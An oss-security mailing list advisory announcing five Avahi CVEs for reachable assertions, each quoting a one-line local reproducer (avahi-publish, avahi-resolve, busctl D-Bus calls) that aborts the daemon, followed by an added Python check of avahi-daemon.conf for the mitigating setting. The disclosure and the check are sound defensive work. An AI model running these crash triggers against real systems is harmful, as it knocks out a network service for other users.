Message-ID: <91be5904-210a-4e21-aa50-e77a41304a1f@oracle.com>
Date: Fri, 6 Oct 2023 14:19:17 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: CVEs assigned for reachable assertions in avahi

While the CVE database still shows them as reserved, Red Hat's & Debian's
trackers show several CVE's being assigned for client requests that can cause
the Avahi server to abort with an assertion failure. Only one of them has
a fix available so far.

----------------------------------------------------------------------------

CVE-2023-38469: https://github.com/lathiat/avahi/issues/455
Reachable assertion in avahi_dns_packet_append_record

"It can be triggered by unprivileged local users (unless
 disable-user-service-publishing is set to yes explicitly):

 avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')"

----------------------------------------------------------------------------

CVE-2023-38470: https://github.com/lathiat/avahi/issues/454
Reachable assertion in avahi_escape_label

"avahi-resolve -n ',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'"

Fix: https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c

----------------------------------------------------------------------------

CVE-2023-38471: https://github.com/lathiat/avahi/issues/453
Reachable assertion in dbus_set_host_name

"It can be triggered by unprivileged local users unless 1c599d8 is backported.

 busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'"

----------------------------------------------------------------------------

CVE-2023-38472: https://github.com/lathiat/avahi/issues/452
Reachable assertion in avahi_rdata_parse

"It can be reproduced by calling something like

 org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0

 using

 avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

 from inside a client creating EntryGroups.

 It can be triggered by unprivileged users unless
 disable-user-service-publishing is set to yes explicitly. By default it's
 set to no."

----------------------------------------------------------------------------

CVE-2023-38473: https://github.com/lathiat/avahi/issues/451
Reachable assertion in avahi_alternative_host_name

"busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'"

-- 
-Alan Coopersmith-               alan.coopersmith@...cle.com
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
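
The message above describes CVE-2023-38469 and CVE-2023-38472 as reachable by unprivileged users unless disable-user-service-publishing is set to yes explicitly. The check below is an added example, not part of the original message or of Avahi's own code. It assumes the option sits in the [publish] section of /etc/avahi/avahi-daemon.conf (per avahi-daemon.conf(5), not stated in the message) and counts only an explicit "yes" as set.

```python
import re
import sys

# CVEs the message describes as reachable by unprivileged users unless
# disable-user-service-publishing is set to yes.
GATED_CVES = ("CVE-2023-38469", "CVE-2023-38472")
OPTION = "disable-user-service-publishing"

def user_publishing_disabled(conf_text):
    """True only if [publish] explicitly sets the option to yes."""
    section, value = None, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank line or comment
            continue
        header = re.fullmatch(r"\[([^\]]+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        key, sep, val = line.partition("=")
        if sep and section == "publish" and key.strip().lower() == OPTION:
            value = val.strip().lower()          # assumption: last assignment wins
    return value == "yes"

def exposed_cves(conf_text):
    """CVEs from the message still reachable by unprivileged users under this config."""
    return () if user_publishing_disabled(conf_text) else GATED_CVES

# Constructed sample configs (not taken from the message).
SAMPLE_DEFAULT = """\
[server]
use-ipv4=yes

[publish]
#disable-user-service-publishing=no
"""
SAMPLE_HARDENED = SAMPLE_DEFAULT.replace(
    "#disable-user-service-publishing=no", "disable-user-service-publishing=yes")

if __name__ == "__main__":
    # Assumed default path; pass another path as the first argument.
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/avahi/avahi-daemon.conf"
    with open(path, encoding="utf-8") as fh:
        hits = exposed_cves(fh.read())
    print("explicitly disabled" if not hits else "still reachable: " + ", ".join(hits))
    sys.exit(1 if hits else 0)
```

The message names this setting only for these two CVEs; the check says nothing about the other three.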